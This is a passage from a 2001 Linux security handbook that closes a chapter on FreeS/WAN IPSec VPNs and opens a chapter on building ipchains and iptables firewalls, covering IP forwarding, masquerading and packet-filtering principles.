tunnel from host2,enter the same command: +ipsec auto --down host-to-host +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 439 +Creating Virtual Private Networks • Chapter 8 439 +Summary +In this chapter,you learned how it is possible to deploy secure authentication and +strong encryption to establish network security using virtual private networks +(VPNs).A VPN provides a private data network over public telecommunication +infrastructures,such as the Internet.It provides both secure authentication and +encryption.It creates a data tunnel between devices so that all data transmitted +between the devices is secure,regardless of what programs the devices are run- +ning.There are three basic types of VPN solutions:telecommuter,router-to- +router,and host-to-host. +A tunnel is created between VPN hosts to ensure that all traffic between them +is secure.The tunnel is created with a tunneling protocol.These protocols are +responsible for encapsulating a data packet before a host transmits it.After the data +is encapsulated,it is sent over the Internet until it arrives at its destination.When it +arrives,the capsule is removed and the destination host processes the data. +IPSec is an Internet Engineering Task Force (IETF) security protocol that is +becoming a standard component of VPN tunneling protocols.As the name sug- +gests,it was designed for IP,and it has gained wide industry support.IPSec pro- +vides secure authentication and encryption over a network by securing all packets +at Layer 3—the network layer—of the Open System Interconnection (OSI) +model.Layer 3 security is significant because Layer 3 is responsible for IP +addressing and routing over the Internet.Security at this layer ensures that every- +thing on the network is secure. +IPSec is often used in conjunction with the Internet Key Exchange (IKE) +protocol.IKE is a key management protocol standard that enhances IPSec,such +as providing a simpler IPSec configuration,flexibility,and more features.IKE is +not required to run IPSec,but it enhances the standard. +Free Secure Wide Area Network (FreeS/WAN) is a Linux VPN implementa- +tion that uses IPSec and IKE.IPSec and IKE are used to provide secure authenti- +cation and encryption of data between two hosts at Layer 3 (the network layer) +of the OSI model.FreeS/WAN creates a secure VPN tunnel between the hosts.It +is the goal of S/WAN developers for all S/WAN implementations to interop- +erate,no matter what device they are installed on.The FreeS/WAN project goal +is to provide freely available source code to promote IPSec and allow it to run on +many different machines.It also avoids export restrictions. +Last,you learned how to compile FreeS/WAN into a Linux kernel and dis- +covered how to configure and test a host-to-host VPN.You captured the traffic +transmitted in the VPN tunnel and realized that it would be useless to a hacker +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 440 +440 Chapter 8 • Creating Virtual Private Networks +because it is encrypted.When the VPN tunnel is configured,all traffic between +the two hosts is encrypted,regardless of the applications running between the +hosts. +Solutions Fast Track +Secure Tunneling with VPNs +(cid:59) VPNs provide a private data network over public telecommunication +infrastructures,such as the Internet,by providing authentication and +encryption through a data “tunnel”between devices.All data transmitted +between the devices through the tunnel is secure,regardless of what pro- +grams the devices are running. +(cid:59) Telecommuter,router-to-router,and host-to-host are three the basic +types of VPN solutions.The solution you choose will depend on your +specific needs. +(cid:59) Tunneling protocols are responsible for encapsulating a data packet +before a host transmits it.The data is encapsulated and sent over the net- +work to its destination.Upon arrival,the capsule is removed and the +data is processed by the destination host.IP tunneling protocols are +powerful because they can transmit foreign protocols over the Internet. +Explaining the IP Security Architecture +(cid:59) IPSec is an Internet Engineering Task Force (IETF) security protocol +that is becoming a standard component of VPN tunneling protocols. +(cid:59) IPSec secures all packets at Layer 3 (the network layer) of the OSI model +by providing secure authentication and encryption over a network.Layer 3 +security ensures that everything on the network is secure,such as IP +addressing and routing over the Internet,as well as all application data. +Creating a VPN by Using FreeS/WAN +(cid:59) FreeS/WAN is a Linux VPN implementation that uses IPSec and IKE. +(cid:59) IKE is a key management protocol standard that enhances IPSec.It pro- +vides enhancements such as simplifying IPSec configuration and adding +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 441 +Creating Virtual Private Networks • Chapter 8 441 +flexibility and more features.It is not required for IPSec,but is often +used in conjunction with it.FreeS/WAN uses Pluto,which is an IKE +daemon. +(cid:59) The Authentication Header (AH) performs authentication at the packet +level in IPSec.The Encapsulating Security Payload (ESP) performs +encryption as well as authentication.FreeS/WAN uses the Kernel IPSec +(KLIPS) to perform AH and ESP functions. +Frequently Asked Questions +The following Frequently Asked Questions, answered by the authors of this book, +are designed to both measure your understanding of the concepts presented in +this chapter and to assist you with real-life implementation of these concepts. To +have your questions about this chapter answered by the author, browse to +www.syngress.com/solutions and click on the “Ask the Author” form. +Q: I had great difficulty installing FreeS/WAN.Does a simpler solution exist for +an IPSec gateway? +A: The FreeS/WAN program is included in several Linux distributions and var- +ious firewall packages.Installation procedures for these products would incor- +porate FreeS/WAN functionality in your system.Depending on your needs +and budget,you may save yourself time and trouble by acquiring +FreeS/WAN through one of these alternate sources. +Some available script sets are designed to allow you to manage firewalls +that also serve as FreeS/WAN IPSec gateways.You can implement +FreeS/WAN through these programs. +Some countries other than the United States have more reasonable +encryption laws and thus offer some general-purpose Linux distributions that +include FreeS/WAN as well,such as the following: +(cid:2) Corel Linux (the server edition from Canada) +(cid:2) Conectiva (from Brazil) +(cid:2) Polish(ed) Linux Distribution (from Poland) +(cid:2) SuSE Linux (European versions from Germany) +(cid:2) Trustix Secure Linux (from Norway) +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 442 +442 Chapter 8 • Creating Virtual Private Networks +You can also use one of the specialized distributions for firewall or router +applications.These products offer various alternatives that include FreeS/ +WAN.Here are a few: +(cid:2) Astaro Security Linux This freeS/WAN configuration is included +among the Web-based firewall management tools. +(cid:2) Gibraltar This Debian GNU/Linux-based distribution can be booted +from a CD-ROM and can be used without a hard disk. +(cid:2) Linux Router Project This freeS/WAN packaged for LRP is available +from the LRP site hosted by Charles Steinkuehler.This distribution can +be booted from a floppy disk. +Q: Can FreeS/WAN interoperate with other versions of IPSec? +A: Any IPSec implementations should be able to communicate with others, +because the protocols that support IPSec are designed to allow interoperation. +However,IPSec protocols are very complex,and therefore difficulties can +arise whenever you attempt interoperation with other programs. +Many IPSec implementations can interoperate with Linux FreeS/WAN; +FreeS/WAN can even interoperate with previous versions of itself.You can +use existing configuration files for newer FreeS/WAN versions in the same +series (for example,all versions 1.x).With the impending release of +FreeS/WAN 2.0,you will need to use the new configuration files.Table 8.7 +lists IPSec implementations that interoperate well with Linux FreeS/WAN. +Table 8.7 IPSec Implementations that Interoperate with FreeS/WAN +Older Versions of FreeS/WAN PGP Mac and Windows IPSEC Client +OpenBSD IRE Safenet/SoftPK +FreeBSD Borderware +NetBSD Freegate +Cisco Routers Timestep +Nortel (Bay Networks) Contivity Switch Shiva/Intel LANrover +Raptor Firewall Sun Solaris +Gauntlet Firewall GVPN Sonicwall +Checkpoint Firewall-1 Radguard +Continued +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 443 +Creating Virtual Private Networks • Chapter 8 443 +Table 8.7 Continued +Older Versions of FreeS/WAN PGP Mac and Windows IPSEC Client +F-Secure VPN for Windows Windows Clients +Watchguard Windows 2000 +Xedia Access Point/QVPN +Q:When I compile FreeS/WAN,I get the error gmp.h:No such file or directory. +Why? +A: The gmp.h error occurs if Pluto cannot locate the GNU Multi-Precision +(GMP) library.The GMP library enables Pluto to calculate large numbers for +public-key encryption operations.Pluto will not compile until the GMP +library is installed. +Two RPMs are usually required for GMP installation:libgmp and +libgmp-devel.Most distributions provide the GMP library.You can obtain the +RPM files from the vendor’s site if they are not included on your distribution +CD-ROMs. +The GMP home page (www.swox.com/gmp) offers the latest version and +information regarding the GMP library. +Q: What type of DES encryption does FreeS/WAN offer? +A: The IPSec standard includes DES support,however DES is not considered +adequately secure by the developers of the FreeS/WAN program.Because +DES methods are not reliable,FreeS/WAN does not use DES to build con- +nections (at the IPSec level) or to negotiate connections (at the IKE level). +FreeS/WAN delivers a higher level of security by using the Triple DES +(3DES) algorithm instead. +Q: Which versions of Linux are compatible with FreeS/WAN? +A: FreeS/WAN is designed to run on any CPU that Linux supports.Although +most distributions will require some minor adjustments for the specific envi- +ronment,the program is widely adaptable beyond the Red Hat versions +(on which FreeS/WAN is created and tested).As previously discussed in +this section,some applications and packages include FreeS/WAN in their +distributions.You can visit www.freeswan.org/freeswan_trees/freeswan-1.9/ +doc/otherdist to consult the FreeS/WAN compatibility document for more +information. +www.syngress.com + +138_linux_08 6/20/01 9:46 AM Page 444 + +138_linux_09 6/20/01 9:48 AM Page 445 +Chapter 9 +Implementing a +Firewall with +Ipchains and +Iptables +Solutions in this chapter: +(cid:2) Understanding the Need for a Firewall +(cid:2) Deploying IP Forwarding and +Masquerading +(cid:2) Configuring Your Firewall to Filter +Network Packets +(cid:2) Understanding Tables and Chains in a +Linux Firewall +(cid:2) Logging Packets at the Firewall +(cid:2) Configuring a Firewall +(cid:2) Counting Bandwidth Usage +(cid:2) Using and Obtaining Automated Firewall +Scripts and Graphical Firewall Utilities +(cid:59) Summary +(cid:59) Solutions Fast Track +(cid:59) Frequently Asked Questions +445 + +138_linux_09 6/20/01 9:48 AM Page 446 +446 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +Introduction +Thus far,you have seen how to further secure your network by enhancing net- +work authentication and encrypting transmissions.However,even the best +authentication and encryption schemes in the world cannot protect a system +from scanning attacks,or from applications designed to flood hosts with bogus +network packets.Distributed denial-of-service (DDoS) attacks such as those +waged by Tribe Flood Network 2000 (TFN2K) and others can instantly flood a +network with Internet Control Message Protocol (ICMP),Transmission Control +Protocol (TCP),and User Datagram Protocol (UDP) packets,effectively disabling +all network hosts.You still need to establish a network perimeter,which means +that you need a firewall. +Fortunately,the open source community has excelled in creating firewall soft- +ware that is ideally suited for networks of any size.Linux natively supports the +ability to route and/or filter packets.Modern Linux systems use either Ipchains +or Iptables to do this.Ipchains supports Linux kernel versions up to 2.2.If you +are using any kernel newer than 2.2 (i.e.,the experimental 2.3 kernel,or the +stable 2.4 kernel),you must use Iptables.The Iptables package supports packet +masquerading and filtering functionality as found in the 2.3 kernel and later.This +functionality is known as netfilter.Therefore,in order to use Iptables,you must +recompile the kernel so that netfilter is installed,and you must also install the +Iptables package.RPMs for Ipchains and Iptables can be found on the that +accompanies this book.The file names are ipchains-1.3.9-17.i386.rpm and +iptables-1.2.1a-1.i386.rpm.You can obtain newer versions from www.rpmfind.net. +NOTE +Ipfwadm is the precursor to both Ipchains and Iptables. Because it is +used in older Linux kernels, this chapter does not consider it. +Depending on your kernel version,you can use these applications to con- +figure your Linux system to act as a router,which means that it ensures packets +get sent from one network to another.At this level,a Linux router does not +examine or filter any traffic.It simply ensures that all traffic addressed to a remote +network gets sent to it. +Ipchains and Iptables also allow you to configure your Linux router to mas- +querade traffic (i.e.,to rewrite IP headers so that a packet appears to originate +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 447 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 447 +from a certain host),or to examine and block traffic.It is even possible to con- +figure your Linux router to do both.The practice of examining and blocking +traffic is often called packet filtering.In this chapter,you will learn how to invoke +packet filtering on your Linux system. +A packet filter works at the Network layer of the Open System +Interconnection Reference Model (OSI/RM).Daemons such as Squid +(www.squid-cache.org) also allow you to examine and block traffic.However, +Squid is not a packet filter;it is a proxy server,which is designed to operate at +the Application layer of the OSI/RM.The primary difference between a packet +filtering router (e.g.,one created by using Ipchains or Iptables) and a proxy server +(e.g.,one enabled by Squid) is that a packet filtering router does not inspect net- +work packets as deeply as a proxy server does.However,proxy servers require +more system resources in order to process network packets.As a result,a proxy +server can sometimes be slow when honoring requests,especially if the machine +is not powerful enough.This is why packet filters and proxy servers are both nec- +essary in a network:one (the packet filter) blocks and filters the majority of net- +work traffic,and the proxy server inspects only certain traffic types.You will learn +more about Squid in Chapter 10. +In this chapter,you will learn how to configure a system as a simple router +and how to implement complex packet filtering so that you can protect your +network from various attacks. +Understanding the Need for a Firewall +Regardless of whether you are implementing a packet filter or a proxy server,a +firewall provides several services.The most essential Linux firewall functions +include: +(cid:2) IP address conservation and traffic forwarding Many firewalls first +act as routers so that different networks (i.e.,the 192.168.1.1/24 and +10.100.100.0/24 networks) can communicate with each other.Many +network administrators use only this function to help create additional +subnets.This feature is included as a firewall element simply because it is +accomplished using either Ipchains or Iptables.Thus,anyone with only +one IP address can create a local area network (LAN) or wide area net- +work (WAN) that has full access to the Internet.You should understand, +however,that a firewall does not necessarily have to provide Network +Address Translation (NAT).Still,many firewalls (including those pro- +vided by Linux and Ipchains/Iptables) allow you to choose this feature. +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 448 +448 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +(cid:2) Network differentiation A firewall is the primary means of creating a +boundary between your network and any other network.Because it cre- +ates a clear distinction between networks,a firewall helps you manage +traffic.A firewall does not necessarily need to be deployed between a +trusted,private network and the Internet.Many times,a firewall is +deployed within a company network to further differentiate certain +company divisions (such as research and development or accounting) +from the rest of the network. +(cid:2) Protection against denial-of-service (DoS), scanning, and +sniffing attacks A firewall acts as a single point that monitors +incoming and outgoing traffic.It is possible for this firewall to limit any +traffic that you choose. +(cid:2) IP and port filtering The ability to allow or reject a connection based +on IP address and port.Such filtering is likely the most understood +function of a firewall.Generally,this type of filtering is usually accom- +plished by packet filters (i.e.,Linux systems that use either Ipchains or +Iptables).Packet filtering can become quite complex,because you must +always consider that traffic can be filtered according to the source of the +packet,as well as the packet’s destination.For example,a packet filter can +block traffic to your network if it originates from a particular IP address +and port. +(cid:2) Content filtering Proxy servers are generally the only types of firewall +that manages and controls traffic by inspecting URL and page content.If +configured properly,a proxy-oriented firewall can identify and block +content that you consider objectionable. +(cid:2) Packet redirection Sometimes,it is necessary for a firewall to send +traffic to another port or another host altogether.For example,suppose +that you have installed Squid proxy server on a separate host than your +firewall.It is likely that you will want to have your firewall automatically +forward all traffic sent to ports 80 and 443 (the standard HTTP and +HTTPS ports) to your proxy server for additional processing. +(cid:2) Enhanced authentication and encryption A firewall has the ability +to authenticate users,and encrypt transmissions between itself and the +firewall of another network. +(cid:2) Supplemented logging One of the most important—though com- +monly ignored—benefits of a firewall is that it allows you to examine all +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 449 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 449 +details about network packets that pass through it.You can learn,for +example,about port scans and various connections to your system. +A firewall is the most efficient means of reducing scanning threats.In Chapter +4 you learned how network and host-based IDS applications help detect and +thwart host scanning.However,an IDS is primarily meant to monitor internal +network transmissions,and cannot protect the network as a firewall.This is +because a firewall acts as a centralized point that can block or allow incoming and +outgoing traffic. +With a firewall in place,you can effectively use one system to protect hun- +dreds of other systems from scanning,sniffing,and DoS attacks.Of course,it is +possible to use multiple firewalls in a network,but in general,as soon as you +place your network hosts behind an adequately configured firewall,a hacker on +the other side of the firewall will have to resort to alternative strategies in order +to manipulate internal network hosts. +Building a Personal Firewall +It is possible to use Ipchains or Iptables on a standard client system.You have +already seen an example of this in Chapter 4,where PortSentry used Ipchains to +block all connections to a host that had illicitly scanned the system.A personal +firewall can be helpful in the following situations: +(cid:2) You have only one system directly connected to the Internet,and don’t +want to create a router or a firewall as an intervening host. +(cid:2) You want to log all blocked (or even allowed) traffic,and then read the +entries in the /var/log/messages file. +(cid:2) You want to block certain ports,such as those belonging to X (177 tcp +and 177 udp,and tcp ports 6000 and 7100). +(cid:2) You want to disable all pinging on the host.If you don’t want to +use Ipchains,you can change the value of /proc/sys/net/ipv4/ +icmp_echo_ignore_all to 1 using: +echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all. +When it comes to building any type of firewall,it is important to consider +your own situation.The commands you learn in the next section will help you +implement the proper solution. +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 450 +450 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +Understanding Packet Filtering Terminology +Table 9.1 provides a list of common terms used when configuring a Linux firewall. +Table 9.1 Common Firewall Terminology +Term Description +Operating system Locking down all unnecessary ports and services so +hardening that the firewall is as impregnable as possible. +Interface A network interface card (NIC). Most firewalls have +multiple NICs, which you must properly configure in +order to filter traffic. Linux refers to the first interface +as eth0, the second as eth1, the third as eth2, and so +forth. +Multihomed A host that has at least two interfaces. Generally, one +interface is exposed to a public network, and one +interface is open only to the trusted network. This +way, the router or firewall is able to forward packets +on the Internet. +Ingress Traffic coming into a network host or interface. +Egress Traffic coming out of a network host or interface. +Rule An entry in the firewall database that determines how +an IP packet will be handled. If an IP packet matches +a particular rule, then the packet can, for example, be +dropped. However, a firewall can do more than +simply drop a packet. A firewall can also forward a +packet to another host or port, or it can forward a +packet to another rule for processing. +Source IP address The IP address where a packet was created. A firewall +reads this address in a packet to help determine +which of its rules apply. +Source port The port where a packet was created. The source port +is almost always associated with the source IP +address. +Destination IP address The IP address of the host to which a packet is +addressed. As with the source IP address, a firewall +reads this address in a packet to help determine how +to apply a rule. +Destination port The port where the IP packet is supposed to be +delivered. The destination port is almost always +associated with the destination IP address. +Continued +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 451 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 451 +Table 9.1 Continued +Term Description +Private IP addresses In order to conserve IP addresses, the Internet +Engineering Task Force (IETF) has established the +following IP network addresses as “private.” This +means that the following networks are meant to be +used behind firewalls and routers: +10.0.0.0/8 +172.16.0.0/12 +192.168.0.0/16 +Although it is possible to route these protocols using +a Linux router, Internet routers will not forward +packets marked with these IP addresses. You will need +to masquerade these connections or use NAT/Port +Address Translation (NAT/PAT) if you want to forward +traffic from private networks to the Internet. +Masquerading The ability to change a packet’s source or destination +IP address so that it can be routed to the Internet. +Generally,whenever a packet passes through a firewall,it is compared to its +rules.If a packet matches a rule,then the firewall processes the packet.Ipchains +gets its name from the fact that it connects each of its rules in an order,much +like connecting links in a chain.Whenever a packet enters a chain in Ipchains,it +must pass all the way through before the kernel allows it to pass on to the oper- +ating system,or pass through to another host.Iptables uses a similar principle, +except that it allows you to create specific tables that can be either processed or +ignored,making the packet-filtering process quicker and more efficient.Iptables +will likely become the standard for some time.Now that you understand some of +the basic firewall terms,it is time to learn more about the most common uses of +a Linux system in regard to routing and firewalling. +NOTE +Many times, a router can be a completely separate host from the fire- +wall. This is especially the case in medium to large networks, where it is +necessary to balance the load between the two. However, routers com- +monly have features that allow you to program them as a packet filter. +Linux is a particularly handy tool because it allows you to do both simple +routing and packet filtering. +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 452 +452 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +Choosing a Linux Firewall Machine +Contrary to what you may think,a firewall does not necessarily have to be the +most powerful system on your network.It should,however,be a dedicated host, +which means that you should not run any other services.The last thing you want +to do is configure your firewall to also be a Samba server or print server. +Additional services may cause a performance drain,and may open up vulnerabili- +ties as well. +Ideally,a small network would be well served by a typical Pentium III or +Pentium IV system with 128MB of RAM and a 500MHz processor.Depending +on the amount of traffic the network generates,however,you could get by with a +much less powerful system.It is not uncommon to see a network with 25 systems +accessing the Internet using a Linux router that is no more powerful than a low- +end 300MHz system.A good NIC is vital for firewalls and routers. +Larger businesses,say,those with demands for Web surfing,e-mail retrieval, +and additional protocols,may require a more powerful system.Considerations for +more powerful systems might include: +(cid:2) A 1GHZ processor. +(cid:2) At least 256MB of RAM (512MB of RAM or more may be preferable). +(cid:2) Quality network interfaces and I/O cards,and possibly RAID 0 for +faster data processing.RAID 0 does not provide data redundancy.It +does,however,provide you with faster read/write time,which is helpful +in regard to a firewall.Although a firewall does not store data as would a +database application server,fast I/O is important,because you want the +machine to process data as quickly as possible.Fast I/O is especially +important if you plan to log extensive amounts of data. +(cid:2) SCSI hard drives.SCSI systems tend to be faster and longer lasting than +their IDE counterparts,thus allowing you a more powerful firewall. +Protecting the Firewall +One of the benefits of having a firewall is that it provides a single point that pro- +cesses incoming and outgoing traffic.However,consider that a firewall can also +provide a central point of attack or failure.A firewall does inform a hacker that a +series of networks does exist behind it.If a hacker is able to defeat this one fire- +wall,the entire network would be open to attack.Furthermore,if a hacker were +able to somehow disable this host,the entire network would be denied all +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 453 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 453 +Internet services.It is important,therefore,that you take measures to protect your +firewall.Consider the following options: +(cid:2) Limit router and firewall access to interactive login only,and physically +secure the system.This way,your firewall is much less susceptible to +remote attack.It is still possible,however,that problems in the kernel +(e.g.,buffer overflows and other programming problems) may occur. +Such problems can lead to compromise of the system,even if you have +no other services running. +(cid:2) If remote access is necessary,consider using access only via Secure Shell +(SSH),properly configured to use public keys to authenticate.Although +SSH is not immune to security threats,it is one of the most popular and +secure remote administration tools for Linux firewalls. +(cid:2) Create a backup host:If your host crashes due to an attack,or simply +because of a hard drive failure,you should have an identical system avail- +able as a replacement. +(cid:2) Monitor the host:Use an IDS application to listen in on connections +made to your router.Usually,installing an IDS application on a separate +host on the network is best.This is called passive monitoring,because the +remote host does not consume the system resources of the firewall.The +IDS application can,for example,send a random ping to the firewall to +test whether it is up,and can then inform you if the host is down. +Consider using an application such as Cheops,for example. +(cid:2) Watch for bug reports concerning Ipchains,Iptables,and the Linux +kernel.Keeping current about such changes can help you quickly +upgrade your system in case a problem is discovered. +Deploying IP Forwarding +and Masquerading +IP forwarding is the ability for a Linux system to act as a router.Packets enter the +Linux kernel,and are then processed by the operating system.Follow these steps +to make your Linux operating system act as a simple IP forwarder: +1. Install at least two NICs into your system.This is necessary,because your +Linux system will then be able to service two different networks.You +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 454 +454 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +must,of course,have all of the required cables and hubs to allow systems +to use all of the available network hosts. +2. Issue the following command at a terminal: +echo "1" > /proc/sys/net/ipv4/ip_forward +This command enables IP forwarding on your Linux router. +Entering the preceding command into some sort of file that runs when- +ever the system boots up.This way,if you restart your system,IP for- +warding will be enabled by default.You can create your own file,or you +can enter it at the bottom of the /etc/rc.d/rc.local file. +3. You can verify whether your system is acting as a router (i.e.,IP for- +warder) by issuing the following command: +cat /proc/sys/net/ipv4/ip_forward +1 +host # +If it reads 1,then your system is now acting as a router.A value of 0 +means that your Linux system is not routing. +The main thing to remember is that a Linux system with simple IP forwarding +enabled can route any network address to another.If you are allotted a range of IP +addresses from a local or regional Internet registry,you can use a multihomed +Linux system to route this set of addresses to another network.For example,if you +are allotted the 128.187.22.0/24 block of IP addresses,you can use a Linux router +to route this network to the 221.9.3.0 network,or to any other. +NOTE +An Internet registry is the local distribution point for IP addresses. +Operating on the authority of the Internet Corporation for Assigned +Numbers (ICANN, at www.icann.org), these bodies ensure that IP +addresses are meted out properly. If you live in the United States, the +American Registry for Internet Numbers (ARIN, at www.arin.net) is the +body to contact. European countries obtain IP addresses from the +Réseaux IP Européens (RIPE, at www.ripe.net/ripe), and the Asia Pacific +region uses the Asia Pacific Network Information Center (APNIC, at +www.apnic.net). +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 455 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 455 +However,Internet routers will not forward traffic from private IP addresses +(i.e.,any network address of 10.0.0.0/8,172.16.0.0/12,or 192.168.0.0/16). +Figure 9.1,for example,shows how traffic from the 10.1.2.0 network and the +192.168.1.0 network can reach all networks,including the 128.187.22.0 network. +However,only traffic from the 128.187.22.0 can reach the Internet. +Figure 9.1 A Linux System Configured as a Forwarding Router +Client Host Although all the networks in the LAN can access each +other only the 128.187.22.0 can access the Internet. +The 10.1.2.0 Network +Linux Router with Only +IP Forwarding Enabled +Client Host Client Host +The 128.187.22.0 Network +The 192.168.1.0 Network +Client Host Client Host Client Host +Client Host Client Host Client Host +Internet +Figure 9.1 shows that traffic from the 10.1.2.0 and 192.168.1.0 networks +cannot reach hosts across the Internet,only because the Internet routers will +simply drop the traffic.To allow private network addresses to reach the Internet, +you need to invoke Ipchains/Iptables-based IP masquerading.However,you have +at least two solutions available to you: +(cid:2) Place a proxy server on the network that has at least two NICs +This proxy server can be configured to accept requests from the internal +network and forward them to the outside network.The first NIC must +be internal,because it will receive traffic passing from inside the net- +work.The second NIC must be external,and will pass internal traffic to +the outside world,and will also receive outside traffic so that it can be +routed to the internal network.Another way of explaining this concept +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 456 +456 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +is that the proxy server receives egress traffic (i.e.,traffic passing outside +of the private IP address networks) and uses an Internet-routable IP +address to forward the packets.The proxy server can also receive ingress +traffic and translate it so that internal systems can receive it.This option +requires the use of an additional software daemon,such as Squid. +(cid:2) Enable IP masquerading In a Linux router,you can use either +Ipchains or Iptables to forward and/or alter the IP headers of packets +originating from private IP address networks to pass through Internet +routers.Both Ipchains and Iptables do this by processing IP packets +through the Linux kernel.As long as the client hosts are configured to +use your Linux router as their default gateway,the clients will be able to +access any and all Internet services,including ping,traceroute,Telnet, +FTP,e-mail (SMTP and POP3),and Web client traffic (ports 80 and +443).This is because the Linux system “mangles”the packets to make +them appear as if they originated from a legitimate IP address,and then +sends them on their way.You should note that this option is not neces- +sarily secure—IP masquerading leaves all client hosts wide open to +attack.If a hacker can attach to your Linux router using Telnet,for +example,he or she can then directly access your systems.You will learn +about how you can use Ipchains and Iptables to create firewall rules +shortly. +We will focus on the second option:Enable IP masquerading. +Masquerading +Masquerading is when your Linux system rewrites the IP headers of a network +packet so that the packet appears to originate from a different host.Once the IP +header has been rewritten to a nonprivate IP address,it can then be rerouted over +the Internet.The practice of rewriting IP packets is colloquially known as packet +mangling,because it alters the contents of the packet.Masquerading is useful because +you can use it to invoke NAT,where one IP address can stand in for several. +As shown in Figure 9.2,masquerading allows the Linux-based system to +translate the 10.1.2.0 network in to the Internet-addressable IP address of +66.1.5.0. +Once the private network of 10.1.2.0 is masqueraded as the IP address of +66.1.5.1,all hosts on this network can access the Internet.Depending on the +subnet mask used for the 10.1.2.0 network,this means that hundreds and perhaps +even thousands of client hosts can be masqueraded under this one IP address. +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 457 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 457 +Figure 9.2 Masquerading the 10.1.2.0 Network as the 66.1.5.1 IP Address +Client Host +Linux-Based Router with +Masquerading Enabled +The 10.1.2.0 Network +10.1.2.0 +66.1.5.1 +Client Host Client Host +All private-IP client hosts can access +the Internet, due to IP masquerading. Internet +Translating the private to routable Internet address is accomplished by a +database stored on the Ipchains/Iptables-based Linux router.The Linux mas- +querading router keeps this database so that it knows how to “untranslate,”as it +were,the packets that have been mangled so that they can then be addressed to +the local,private network.This process occurs very quickly,although it is impor- +tant that you have the proper amount of system power to enable the translation +database to do its jobs. +NOTE +Ipchains-based NAT is not compatible with Microsoft Point-to-Point +Tunneling Protocol (PPTP) VPN clients. Not surprisingly, Microsoft did not +follow RFC-defined standards. Not only did they not follow RFCs, but +their PPTP is also plagued by a number of design vulnerabilities that +affect security. You can, if you want, find workarounds to provide IPSec +and VPN support between your Linux system and Microsoft VPN-enabled +systems at www.impsec.org/linux/masquerade/ip_masq_vpn.html. +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 458 +458 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +Simple masquerading leaves the network “wide open,”meaning that anyone +who enters your firewall or router as a default gateway can have full access to all +attached networks.Packet filtering is the answer to locking down access to your +network.You can learn more about masquerading by reading the NAT-HOWTO +file,which can be found on the accompanying CD. +Configuring Your Firewall +to Filter Network Packets +Creating packet-filtering rules can become somewhat involved,mainly because +you have to spend a great deal of time determining the source and destination IP +addresses and ports.You also need to be familiar with how connections are made, +managed,and ended.However,there are some simple rules that can help you +create a packet filter as soon as possible.As far as outgoing traffic is concerned, +you should take the following steps: +1. Configure your Linux firewall to deny all outgoing traffic unless +explicitly allowed.This means that your firewall will deny all services to +your end users,unless you allow it by creating a rule allowing a specific +traffic type. +2. Configure your firewall to allow your internal network to use ports over +1023.Most network clients use these ports to establish connections to +network services. +3. Identify the ports of your services to which you want to allow access.If, +for example,you want to allow end users to access the Web,you must +create a rule allowing all local network hosts to access all remote systems +at ports 80 and 443.Likewise,if you want your local clients to use +remote POP3 servers,you will have to allow local hosts to use access +remote systems at port 110. +As far as incoming traffic is concerned,you have many options.Many systems +administrators want to create a firewall that forbids all incoming traffic,except for +the TCP and UDP packets necessary when building up and tearing down a net- +work connection.For example,if you want to allow internal clients to allow +access to the Web,you will need to allow remote hosts to make connections to +your firewall.This involves allowing remote hosts to open up their local ports +above 1023 to access your systems at ports above 1023.Therefore,you should +take the following steps: +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 459 +Implementing a Firewall with Ipchains and Iptables • Chapter 9 459 +1. Configure your firewall to prohibit all incoming traffic from accessing +any services below port 1023.The most secure firewall will not allow +any connections to these ports. +2. Forbid all incoming traffic unless it is part of an already established ses- +sion.In Ipchains,the -y option will do this.In Iptables,you would use +the --SYN option.Each of these options will have the firewall match +and discard any incoming packet with the SYN bit set.All other packets +with the FIN or ACK bit set will be allowed,because the firewall +assumes that these packets are part of an already established session (e.g., +an internal user is closing an SMTP or POP3 session with a remote host +on the Internet).If you do not add this rule,then it is easier for mali- +cious users to get around your firewall. +3. Disable all incoming ICMP traffic to protect yourself against DoS +attacks.This step is optional,of course,because disabling this feature +often makes network troubleshooting quite difficult. +4. Disable all forwarding except for networks that require it.The Ipchains +and Iptables commands allow you to masquerade private IP networks. +You want to,however,masquerade only certain networks. +5. To enable logging,use the -l option in Ipchains,or the -j LOG target in +Iptables. +Damage & Defense… +Customized Packet Filtering +Your firewall configuration needs will be specific to your situation. You +need to consider the design of your network, and the services you need +to provide. If, for example, you want to allow remote clients to access +certain internal hosts, such as a Web server, you can place the Web +server outside of the firewall, or you can allow incoming traffic to access +port 80. Consider, however, that if you place your Web server behind +your firewall, you will have to ensure that this request is then forwarded +to a specific internal host. Later in this chapter, you will see how you can +manipulate the default INPUT, FORWARD, and OUTPUT chains using +Ipchains and Iptables. +Continued +www.syngress.com + +138_linux_09 6/20/01 9:48 AM Page 460 +460 Chapter 9 • Implementing a Firewall with Ipchains and Iptables +It is common practice to use packet filtering to block the following: +(cid:2) Incoming and outgoing ICMP packets +(cid:2) Access to remote POP3 servers +(cid:2) Access to 